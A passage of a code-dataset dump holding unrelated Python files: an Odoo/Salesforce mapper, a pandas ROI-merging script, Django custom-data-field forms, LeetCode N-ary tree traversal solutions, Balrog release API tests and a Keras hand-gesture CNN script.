'res.country',\n            [('code', '=', country_code)]\n        )\n        # we tolerate the fact that country is null\n        if len(country_id) > 1:\n            raise MappingError(\n                'Many countries found to be linked with partner %s' % record\n            )\n\n        if not country_id:\n            country_id = False\n            raise MappingError(\n                \"No country %s found when mapping partner %s\" % (\n                    country_code,\n                    record\n                )\n            )\n        return country_id[0] if country_id else False\n\n    def _title_id(self, record, title_key):\n        title = record.get(title_key)\n        if not title:\n            return False\n        title_id = self.session.search(\n            'res.partner.title',\n            [('name', '=', title)],\n        )\n        if len(title_id) > 1:\n            raise MappingError(\n                'Many countitle found to be linked with partner %s' % record\n            )\n        if title_id:\n            return title_id[0]\n        return self.session.create(\n            'res.partner.title',\n            {'name': title}\n        )\n\nclass PriceMapper(ImportMapper):\n\n    def get_currency_id(self, record):\n        currency_iso_code = record.get('CurrencyIsoCode')\n        if not currency_iso_code:\n            raise MappingError(\n                'No currency Given for: %s' % record\n            )\n        currency_id = self.session.search(\n            'res.currency',\n            [('name', '=ilike', currency_iso_code)]\n        )\n        if not currency_id:\n            raise MappingError(\n                'No %s currency available. '\n                'Please create one manually' % currency_iso_code\n            )\n        if len(currency_id) > 1:\n            raise ValueError(\n                'Many Currencies found for %s. 
'\n 'Please ensure your multicompany rules are corrects '\n 'or check that the job is not runned by '\n 'the admin user' % currency_iso_code\n )\n return currency_id[0]\n","sub_path":"connector_salesforce/unit/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"125688040","text":"import pandas as pd\nimport numpy as np\nimport math\nimport os\n\n\ndef output_data(root,file,add_casename):\n roi_path = os.path.join(root, file)\n roi_data = pd.read_csv(roi_path, encoding='gbk')\n if 'name' in roi_data.columns.values:\n roi_data.drop('name', axis=1, inplace=True)\n\n roi_data['path'] = roi_path\n\n if add_casename == True:\n patient_name = root[root.find('formal') + 7:]\n if '^^' in patient_name:\n patient_name = patient_name[:patient_name.find('^^')]\n if file[0:-4] == 'roi':\n roi_name = ''\n else:\n roi_name = '_' + file[3]\n roi_data.insert(0, 'casename', patient_name + roi_name)\n else:\n roi_data.rename(columns={'Unnamed: 0':'casename'},inplace=True)\n\n return roi_data\n\n\ndef merge_roi(dir_path,out_path,add_casename):\n df = pd.DataFrame()\n for root,dirs,files in os.walk(dir_path):\n if dirs:\n for dir in dirs:\n dir_path = os.path.join(root,dir)\n file_list = os.listdir(dir_path)\n if 'roi1.csv' in file_list:\n roi_data = output_data(dir_path,'roi0.csv',add_casename)\n df = pd.concat([roi_data, df], axis=0, sort=False)\n\n roi_data = output_data(dir_path,'roi1.csv',add_casename)\n df = pd.concat([roi_data,df],axis=0,sort=False)\n # print(df)\n else:\n roi_data = output_data(dir_path, 'roi.csv', add_casename)\n roi_num = roi_data.shape[0]\n if 'Unnamed: 0' in roi_data.columns.values.tolist():\n for i in range(roi_num):\n roi_data['casename'][i] += ('_'+str(roi_data['Unnamed: 0'][i]))\n\n roi_data.drop('Unnamed: 0',axis=1,inplace=True)\n df = pd.concat([roi_data, df], axis=0, sort=False)\n\n df.insert(len(df.columns.values.tolist())-1, 'path', df.pop('path'))\n df.to_csv(out_path,index=None)\n\n col1 = df.columns.values.tolist()[0]\n df1 = df.duplicated(col1,keep=False)\n df2 = df.duplicated(col1,keep='first')\n print(df2.append(df1).drop_duplicates(keep=False))\n\n\ndef stat_PIRADS(csv_path):\n df = pd.read_csv(csv_path)\n data = df['PIRADS'].values\n hist=[0,0,0,0,0,0]\n for val in data:\n try:\n hist[round(float(val))] += 1\n except:\n print(val)\n\n print(hist)\n\n\ndef concate_csv(csv_path1,csv_path2,save_path):\n csv1 = pd.read_csv(csv_path1)\n csv2 = pd.read_csv(csv_path2)\n\n csv = pd.concat([csv1,csv2],axis=0,sort=False)\n csv.insert(len(csv.columns.values.tolist()) - 1, 'path', csv.pop('path'))\n csv.to_csv(save_path,index=None)\n\n\ndef add_PIRADS(all_path,PIRADS_path):\n all_data = pd.read_csv(all_path)\n pirads_data = pd.read_csv(PIRADS_path, encoding='utf-8')\n id_list = pirads_data['ID'].values.tolist()\n\n for i in range(all_data.shape[0]):\n id = all_data['ID'][i]\n if id in id_list:\n all_data['PIRADS'][i] = pirads_data[pirads_data['ID']==id]['PIRADS'].astype(\"int\").values[0]\n\n all_data.to_csv(all_path,index=None)\n\n\n# merge_roi(r'W:\\PrcoessedData\\JSPH_PCa\\DWI1500',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv',add_casename=True)\n# merge_roi(r'W:\\PrcoessedData\\PCaLNI\\OneRoiFiles',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\LNI_roi.csv',add_casename=False)\n\n# add_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\JSPH-2016-raw.csv')\n\n# 
merge_roi(r'W:\\PrcoessedData\\PI-RADS',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\all_info.csv',add_casename=True)\n\n# stat_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\LNI_roi.csv')\n# stat_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv')\n\n# concate_csv(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\LNI_roi.csv',r'D:\\PycharmProjects\\learning\\PIRADS\\data\\PCa_roi.csv',\n# r'D:\\PycharmProjects\\learning\\PIRADS\\data\\all_roi.csv')\n# stat_PIRADS(r'D:\\PycharmProjects\\learning\\PIRADS\\data\\all_roi.csv')\n\n","sub_path":"pretreatment/roi_to_csv.py","file_name":"roi_to_csv.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1442012","text":"import json\nimport re\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import RegexValidator, validate_slug\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext as _\nfrom django import forms\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Div, HTML\n\nfrom dimagi.utils.decorators.memoized import memoized\n\nfrom .models import (CustomDataFieldsDefinition, CustomDataField,\n CUSTOM_DATA_FIELD_PREFIX)\n\n\nclass CustomDataFieldsForm(forms.Form):\n \"\"\"\n The main form for editing a custom data definition\n \"\"\"\n data_fields = forms.CharField(widget=forms.HiddenInput)\n\n def verify_no_duplicates(self, data_fields):\n errors = set()\n slugs = [field['slug'].lower()\n for field in data_fields if 'slug' in field]\n for slug in slugs:\n if slugs.count(slug) > 1:\n errors.add(_(\"Key '{}' was duplicated, key names must be \"\n \"unique.\").format(slug))\n return errors\n\n def clean_data_fields(self):\n raw_data_fields = json.loads(self.cleaned_data['data_fields'])\n errors = set()\n data_fields = []\n for raw_data_field in raw_data_fields:\n data_field_form = CustomDataFieldForm(raw_data_field)\n data_field_form.is_valid()\n data_fields.append(data_field_form.cleaned_data)\n if data_field_form.errors:\n errors.update([error[0]\n for error in data_field_form.errors.values()])\n\n errors.update(self.verify_no_duplicates(data_fields))\n\n if errors:\n raise ValidationError('
<br/>'.join(sorted(errors)))\n\n        return data_fields\n\n\nclass XmlSlugField(forms.SlugField):\n    default_validators = [\n        validate_slug,\n        RegexValidator(\n            re.compile(r'^(?!xml)', flags=re.IGNORECASE),\n            _('Properties cannot begin with \"xml\"'), 'invalid_xml'\n        )\n    ]\n\n\nclass CustomDataFieldForm(forms.Form):\n    \"\"\"\n    Sub-form for editing an individual field's definition.\n    \"\"\"\n    label = forms.CharField(\n        required=True,\n        error_messages={'required': _('All fields are required')}\n    )\n    slug = XmlSlugField(\n        required=True,\n        error_messages={\n            'required': _(\"All fields are required\"),\n            'invalid': _(\"Key fields must consist only of letters, numbers, \"\n                         \"underscores or hyphens.\")\n        }\n    )\n    is_required = forms.BooleanField(required=False)\n    choices = forms.CharField(widget=forms.HiddenInput, required=False)\n\n    def __init__(self, raw, *args, **kwargs):\n        # Pull the raw_choices out here, because Django incorrectly\n        # serializes the list and you can't get it\n        self._raw_choices = filter(None, raw.get('choices', []))\n        super(CustomDataFieldForm, self).__init__(raw, *args, **kwargs)\n\n    def clean_choices(self):\n        return self._raw_choices\n\n\nclass CustomDataFieldsMixin(object):\n    \"\"\"\n    Provides the interface for editing the ``CustomDataFieldsDefinition``\n    for each entity type.\n    Each entity type must provide a subclass of this mixin.\n    \"\"\"\n    urlname = None\n    template_name = \"custom_data_fields/custom_data_fields.html\"\n    field_type = None\n    entity_string = None  # User, Group, Location, Product...\n\n    @classmethod\n    def get_validator(cls, domain):\n        data_model = CustomDataFieldsDefinition.get_or_create(domain, cls.field_type)\n        return data_model.get_validator(cls)\n\n    @classmethod\n    def page_name(cls):\n        return _(\"Edit {} Fields\").format(cls.entity_string)\n\n    def get_definition(self):\n        return CustomDataFieldsDefinition.get_or_create(self.domain,\n                                                        self.field_type)\n\n    def get_custom_fields(self):\n        definition = self.get_definition()\n        if definition:\n            return definition.fields\n        else:\n            return []\n\n    def save_custom_fields(self):\n        definition = self.get_definition() or CustomDataFieldsDefinition()\n        definition.field_type = self.field_type\n        definition.domain = self.domain\n        definition.fields = [\n            self.get_field(field)\n            for field in self.form.cleaned_data['data_fields']\n        ]\n        definition.save()\n\n    def get_field(self, field):\n        return CustomDataField(\n            slug=field.get('slug'),\n            is_required=field.get('is_required'),\n            label=field.get('label'),\n            choices=field.get('choices'),\n        )\n\n    @property\n    def page_context(self):\n        return {\n            \"custom_fields\": json.loads(self.form.data['data_fields']),\n            \"custom_fields_form\": self.form,\n        }\n\n    @property\n    @memoized\n    def form(self):\n        if self.request.method == \"POST\":\n            return CustomDataFieldsForm(self.request.POST)\n        else:\n            serialized = json.dumps([field.to_json()\n                                     for field in self.get_custom_fields()])\n            return CustomDataFieldsForm({'data_fields': serialized})\n\n    def post(self, request, *args, **kwargs):\n        if self.form.is_valid():\n            self.save_custom_fields()\n            return self.get(request, success=True, *args, **kwargs)\n        else:\n            return self.get(request, *args, **kwargs)\n\n\ndef add_prefix(field_dict):\n    \"\"\"\n    Prefix all keys in the dict with the defined\n    custom data prefix (such as data-field-whatevs).\n    \"\"\"\n    return {\n        \"{}-{}\".format(CUSTOM_DATA_FIELD_PREFIX, k): v\n        for k, v in field_dict.iteritems()\n    }\n\n\ndef _make_field(field):\n    if field.choices:\n        return forms.ChoiceField(\n            label=field.label,\n            
required=field.is_required,\n choices=[('', _('Select one'))] + [(c, c) for c in field.choices],\n )\n return forms.CharField(label=field.label, required=field.is_required)\n\n\nclass CustomDataEditor(object):\n \"\"\"\n Tool to edit the data for a particular entity, like for an individual user.\n \"\"\"\n def __init__(self, field_view, domain, existing_custom_data=None,\n post_dict=None, required_only=False):\n self.field_view = field_view\n self.domain = domain\n self.existing_custom_data = existing_custom_data\n self.required_only = required_only\n self.form = self.init_form(post_dict)\n\n @property\n @memoized\n def model(self):\n definition = CustomDataFieldsDefinition.get_or_create(\n self.domain,\n self.field_view.field_type,\n )\n return definition or CustomDataFieldsDefinition()\n\n def is_valid(self):\n return self.form.is_valid()\n\n def get_data_to_save(self):\n cleaned_data = self.form.cleaned_data\n self.existing_custom_data = None\n self.form = self.init_form(add_prefix(cleaned_data))\n self.form.is_valid()\n return cleaned_data\n\n def init_form(self, post_dict=None):\n fields = {\n field.slug: _make_field(field) for field in self.model.fields\n if not self.required_only or field.is_required\n }\n field_names = fields.keys()\n\n CustomDataForm = type('CustomDataForm', (forms.Form,), fields)\n CustomDataForm.helper = FormHelper()\n CustomDataForm.helper.form_tag = False\n CustomDataForm.helper.layout = Layout(\n Fieldset(\n _(\"Additional Information\"),\n *field_names\n ) if self.model.fields else '',\n self.get_uncategorized_form(field_names),\n )\n CustomDataForm._has_uncategorized = bool(\n self.get_uncategorized_form(field_names)\n )\n\n if post_dict:\n fields = post_dict\n elif self.existing_custom_data is not None:\n fields = add_prefix(self.existing_custom_data)\n else:\n fields = None\n\n self.form = CustomDataForm(fields, prefix=CUSTOM_DATA_FIELD_PREFIX)\n return self.form\n\n def get_uncategorized_form(self, field_names):\n\n def FakeInput(val):\n return HTML('{}'\n .format(val))\n\n def Label(val):\n return HTML(''.format(val))\n\n def _make_field_div(slug, val):\n return Div(\n Label(slug),\n Div(\n FakeInput(val),\n css_class=\"controls\",\n ),\n css_class=\"control-group\",\n )\n\n help_div = [\n _make_field_div(slug, val)\n for slug, val in self.existing_custom_data.items()\n if slug not in field_names\n ] if self.existing_custom_data is not None else []\n\n msg = \"\"\"\n Warning!\n This data is not part of the specified user fields and will be\n deleted if you save.\n You can add them here to prevent this.\n \"\"\".format(reverse(\n self.field_view.urlname, args=[self.domain]\n ))\n\n return Fieldset(\n _(\"Unrecognized Information\"),\n Div(\n HTML(msg),\n css_class=\"alert alert-error\",\n ),\n *help_div\n ) if len(help_div) else HTML('')\n","sub_path":"corehq/apps/custom_data_fields/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"572107639","text":"# https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/\n\n'''\n法1: 利用 队列 实现广度优先搜索\n\n时间复杂度:O(n)。n 指的是节点的数量。\n空间复杂度:O(n)。\n\n我们要构造一个 sub-lists 列表, 其中每个sub-list 是树中一行的值\n行应该按从上到下的顺序排列\n\n因为我们从根节点开始遍历树, 然后向下搜索最接近根节点的节点, 这是广度优先搜索\n我们适用队列来进行广度优先搜索, 队列具有先进先出的特性\n\n!!!!!在这里使用栈是错误的选择, 栈应用于深度优先搜索\n\n# 详细图片讲解: https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/solution/ncha-shu-de-ceng-xu-bian-li-by-leetcode/\n我们可以看到它从左到右, 并且从上到下顺序遍历节点\n\n下一步: 
研究如何在这个算法基础上保存每一层的列表,并且在根节点为空时正常工作\n\n再构造下一层的列表时,我们需要创建新的子列表,然后将该层的所有节点的值插入到列表中。\n一个很好的方法时在 while 循环体开始时记录队列的当前大小 size。\n然后用另一个循环来处理 size 数量的节点。这样可以保证 while 循环在每一次迭代处理一层。\n\n使用队列十分重要,如果使用 Vector,List,Array 的话,我们删除元素需要 O(n) 的时间复杂度。\n而队列删除元素只需要 O(1) 的时间。\n\n'''\nimport collections\nfrom typing import List\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if root is None:\n return []\n result = []\n queue = collections.deque([root])\n while queue:\n level = []\n for _ in range(len(queue)):\n node = queue.popleft()\n level.append(node.val)\n queue.extend(node.children)\n result.append(level)\n return result\n\n\n'''\n法2: 简化的广度优先搜索\n\n时间复杂度:O(n)。n 指的是节点的数量。\n空间复杂度:O(n),我们的列表包含所有节点。\n'''\n\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if root is None:\n return []\n\n result = []\n previous_layer = [root]\n\n while previous_layer:\n current_layer = []\n result.append([])\n for node in previous_layer:\n result[-1].append(node.val)\n current_layer.extend(node.children)\n previous_layer = current_layer\n return result\n\n'''\n法3: 递归\n\n我们可以使用递归来解决这个问题,通常我们不能使用递归进行广度优先搜索。\n这是因为广度优先搜索基于队列,而递归运行时使用堆栈,适合深度优先搜索。\n\n'''\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n def traverse_node(node, level):\n if len(result) == level:\n result.append([])\n result[level].append(node.val)\n for child in node.children:\n traverse_node(child, level + 1)\n\n result = []\n if root is not None:\n traverse_node(root, 0)\n return result\n\n# 链接:https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/solution/ncha-shu-de-ceng-xu-bian-li-by-leetcode/\n\n\n\n\n","sub_path":"Week_02/429_中等_N叉树的层序遍历_n-ary-tree-level-order-traversal.py","file_name":"429_中等_N叉树的层序遍历_n-ary-tree-level-order-traversal.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506613298","text":"import mock\nimport simplejson as json\n\nfrom sqlalchemy import select\n\nfrom auslib.admin.base import db\nfrom auslib.test.admin.views.base import ViewTest, JSONTestMixin, HTMLTestMixin\n\nclass TestReleasesAPI_JSON(ViewTest, JSONTestMixin):\n def testReleasePost(self):\n data = json.dumps(dict(detailsUrl='blah', fakePartials=True))\n ret = self._post('/releases/d', data=dict(data=data, product='d', version='d', data_version=1))\n self.assertStatusCode(ret, 200)\n ret = select([db.releases.data]).where(db.releases.name=='d').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"d\",\n \"detailsUrl\": \"blah\",\n \"fakePartials\": true,\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"d\": {\n \"complete\": {\n \"filesize\": 1234\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testReleasePostCreatesNewRelease(self):\n data = json.dumps(dict(bouncerProducts=dict(linux='foo'), name='e'))\n ret = self._post('/releases/e', data=dict(data=data, product='e', version='e'))\n self.assertStatusCode(ret, 201)\n ret = db.releases.t.select().where(db.releases.name=='e').execute().fetchone()\n self.assertEqual(ret['product'], 'e')\n self.assertEqual(ret['version'], 'e')\n self.assertEqual(ret['name'], 'e')\n self.assertEqual(json.loads(ret['data']), json.loads(\"\"\"\n{\n \"name\": \"e\",\n \"schema_version\": 1,\n \"bouncerProducts\": {\n \"linux\": \"foo\"\n }\n}\n\"\"\"))\n\n def testReleasePostInvalidKey(self):\n 
data = json.dumps(dict(foo=1))\n ret = self._post('/releases/a', data=dict(data=data))\n self.assertStatusCode(ret, 400)\n\n def testLocalePut(self):\n data = json.dumps(dict(complete=dict(filesize=435)))\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='a', version='a', data_version=1))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"complete\": {\n \"filesize\": 435\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutForNewRelease(self):\n data = json.dumps(dict(complete=dict(filesize=678)))\n ret = self._put('/releases/e/builds/p/a', data=dict(data=data, product='e', version='e'))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='e').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"e\",\n \"schema_version\": 1,\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"a\": {\n \"complete\": {\n \"filesize\": 678\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutAppend(self):\n data = json.dumps(dict(partial=dict(fileUrl='abc')))\n ret = self._put('/releases/d/builds/p/g', data=dict(data=data, product='d', version='d', data_version=1))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='d').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"d\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"d\": {\n \"complete\": {\n \"filesize\": 1234\n }\n },\n \"g\": {\n \"partial\": {\n \"fileUrl\": \"abc\"\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutWithCopy(self):\n data = json.dumps(dict(partial=dict(filesize=123)))\n data = dict(data=data, product='a', version='a', copyTo=json.dumps(['ab']), data_version=1)\n ret = self._put('/releases/a/builds/p/l', data=data)\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=2)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"partial\": {\n \"filesize\": 123\n }\n }\n }\n }\n }\n}\n\"\"\"))\n ret = select([db.releases.data]).where(db.releases.name=='ab').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"ab\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"partial\": {\n \"filesize\": 123\n }\n }\n }\n }\n }\n}\n\"\"\"))\n\n def testLocalePutChangeVersion(self):\n data = json.dumps(dict(extv='b'))\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='a', version='b', data_version=1))\n self.assertStatusCode(ret, 201)\n self.assertEqual(ret.data, json.dumps(dict(new_data_version=3)), \"Data: %s\" % ret.data)\n ret = select([db.releases.data]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(json.loads(ret), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n \"extv\": \"b\"\n }\n 
}\n }\n }\n}\n\"\"\"))\n newVersion = select([db.releases.version]).where(db.releases.name=='a').execute().fetchone()[0]\n self.assertEqual(newVersion, 'b')\n\n def testLocalePutBadJSON(self):\n ret = self._put('/releases/a/builds/p/l', data=dict(data='a', product='a', version='a'))\n self.assertStatusCode(ret, 400)\n\n def testLocaleGet(self):\n ret = self._get('/releases/d/builds/p/d')\n self.assertStatusCode(ret, 200)\n self.assertEqual(json.loads(ret.data), dict(complete=dict(filesize=1234)))\n self.assertEqual(ret.headers['X-Data-Version'], '1')\n\n def testLocalePutNotAllowed(self):\n ret = self.client.put('/releases/d/builds/p/d', data=dict(product='a'))\n self.assertStatusCode(ret, 401)\n\n def testLocalePutCantChangeProduct(self):\n data = json.dumps(dict(complete=dict(filesize=435)))\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='b', version='a'))\n self.assertStatusCode(ret, 400)\n\n def testLocaleRevertsPartialUpdate(self):\n data = json.dumps(dict(complete=dict(filesize=1)))\n with mock.patch('auslib.admin.base.db.releases.addLocaleToRelease') as r:\n r.side_effect = Exception(\"Fail\")\n ret = self._put('/releases/a/builds/p/l', data=dict(data=data, product='a', version='c', data_version=1))\n self.assertStatusCode(ret, 500)\n ret = db.releases.t.select().where(db.releases.name=='a').execute().fetchone()\n self.assertEqual(ret['product'], 'a')\n self.assertEqual(ret['version'], 'a')\n self.assertEqual(json.loads(ret['data']), dict(name='a'))\n\n # Test get of a release's full data column, queried by name\n def testGetSingleReleaseBlob(self):\n ret = self._get(\"/releases/d/data\")\n self.assertStatusCode(ret, 200)\n self.assertEqual(json.loads(ret.data), json.loads(\"\"\"\n{\n \"name\": \"d\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"d\": {\n \"complete\": {\n \"filesize\": 1234\n }\n }\n }\n }\n }\n}\n\"\"\"), msg=ret.data)\n\n\nclass TestReleasesAPI_HTML(ViewTest, HTMLTestMixin):\n\n def testGetReleases(self):\n ret = self._get(\"/releases.html\")\n self.assertStatusCode(ret, 200)\n self.assertTrue('' in ret.data, msg=ret.data)\n\n # Test get of a release's full data column, queried by name\n def testGetSingleRelease(self):\n ret = self._get(\"/releases/d\")\n self.assertStatusCode(ret, 200)\n self.assertTrue(\"\" in ret.data, msg=ret.data)\n\n def testNewReleasePut(self):\n\n ret = self._put('/releases/new_release', data=dict(name='new_release', version='11', product='Firefox',\n blob=\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n }\n }\n }\n }\n}\n\"\"\"))\n \n #json.dumps(newReleaseFile.getvalue())))\n self.assertEquals(ret.status_code, 201, \"Status Code: %d, Data: %s\" % (ret.status_code, ret.data))\n r = db.releases.t.select().where(db.releases.name=='new_release').execute().fetchall()\n self.assertEquals(len(r), 1)\n self.assertEquals(r[0]['name'], 'new_release')\n self.assertEquals(r[0]['version'], '11')\n self.assertEquals(r[0]['product'], 'Firefox')\n self.assertEquals(json.loads(r[0]['data']), json.loads(\"\"\"\n{\n \"name\": \"a\",\n \"platforms\": {\n \"p\": {\n \"locales\": {\n \"l\": {\n }\n }\n }\n }\n}\n\"\"\"))\n\n","sub_path":"auslib/test/admin/views/test_releases.py","file_name":"test_releases.py","file_ext":"py","file_size_in_byte":9896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149941948","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 29 11:59:20 2018\n\n@author: 
jai\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.convolutional import MaxPooling2D\nfrom keras.layers.core import Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers.core import Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing.image import img_to_array\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\nimport imutils\n\n\nEPOCHS = 10\nINIT_LR = 1e-3\nBS = 2\n\nmodel = Sequential()\ninputShape = (28, 28, 1)\n \nmodel.add(Conv2D(20, (5, 5), padding=\"same\",\tinput_shape=inputShape))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\nmodel.add(Conv2D(50, (5, 5), padding=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n# first (and only) set of FC => RELU layers\nmodel.add(Flatten())\nmodel.add(Dense(500))\nmodel.add(Activation(\"relu\"))\n\n# softmax classifier\nmodel.add(Dense(2))\nmodel.add(Activation(\"softmax\")) \n\n\n#Capture images\ndef capture_image():\n video = cv2.VideoCapture(0)\n bbox_initial = (100, 100, 200, 200)\n bbox = bbox_initial\n \n while True:\n success, frame = video.read()\n display = frame.copy()\n p1 = (int(bbox[0]), int(bbox[1]))\n p2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))\n cv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)\n \n roi = frame[100:300, 100:300]\n \n \n if not success:\n break\n \n cv2.imshow(\"frame\", frame)\n \n k = cv2.waitKey(1) & 0xff\n if k == 27:# escape pressed \n break\n elif k == 115: # s pressed\n fname = input(\"File name\")\n cv2.imwrite('{}.jpg'.format(fname), roi)\n \n # release the capture inside the function: 'video' is local, so doing this at module level raised NameError\n cv2.destroyAllWindows()\n video.release()\n\nbg_img = cv2.imread('bg_black.jpg')\n\ncurrent_frame_img = cv2.imread('current.jpg')\n\ndef preprocess_image_v2(current_frame_img, bg_img):\n blur = cv2.GaussianBlur(current_frame_img, (15, 15), 2)\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n lower = np.array([0,50,50])\n upper = np.array([180,140,180])\n mask = cv2.inRange(hsv, lower, upper)\n masked_img = cv2.bitwise_and(current_frame_img, current_frame_img, mask=mask)\n diff = cv2.absdiff(bg_img, masked_img)\n mask2 = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n th, mask_thresh = cv2.threshold(mask2, 10, 255, cv2.THRESH_BINARY)\n return mask_thresh\n \n\ndef preprocess_image(current_frame_img, bg_img):\n diff = cv2.absdiff(bg_img, current_frame_img)\n mask = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n th, mask_thresh = cv2.threshold(mask, 10, 255, cv2.THRESH_BINARY)\n plot_image(mask_thresh)\n return mask_thresh\n\ndef bgrtorgb(image):\n return cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)\n\n\ndef plot_image(image, figsize=(8,8), recolour=False):\n if image.shape[-1] == 1 or len(image.shape) == 2:\n plt.imshow(image, cmap='gray')\n else:\n raise Exception(\"Image has invalid shape.\")\n\nmask_thresh = preprocess_image(current_frame_img, bg_img)\nplot_image(mask_thresh)\nmasked = cv2.resize(mask_thresh, (300, 300))\n\nplot_image(masked)\n\npath=os.getcwd()+'/'\nprint(path)\n\ndata = []\nlabels = []\n \nfor img in os.listdir(path):\n print(img)\n image = cv2.imread(img)\n image = preprocess_image_v2(image, bg_img)\n image = cv2.resize(image, (28, 28))\n image = img_to_array(image)\n data.append(image)\n \n label = img.rstrip('0123456789')\n label = img.split('.')[0]\n print(label[:4])\n label = 1 if label[:4] == \"five\" else 0\n labels.append(label)\n \ndata = np.array(data, dtype=\"float\") / 255.0\nlabels = np.array(labels)\n \n(trainX, testX, trainY, testY) = train_test_split(data, labels, \n test_size=0.25, random_state=42)\n \ntrainY = to_categorical(trainY, num_classes=2)\ntestY = to_categorical(testY, num_classes=2) \n\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\n\theight_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\n\thorizontal_flip=True, fill_mode=\"nearest\")\n\nopt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)\nmodel.compile(loss=\"binary_crossentropy\", optimizer=opt,\n\tmetrics=[\"accuracy\"])\n \n# train the network\nprint(\"[INFO] training network...\")\nH = model.fit_generator(aug.flow(trainX, trainY, batch_size=BS),\n\tvalidation_data=(testX, testY), steps_per_epoch=len(trainX) // BS,\n\tepochs=EPOCHS, verbose=1)\n\n# 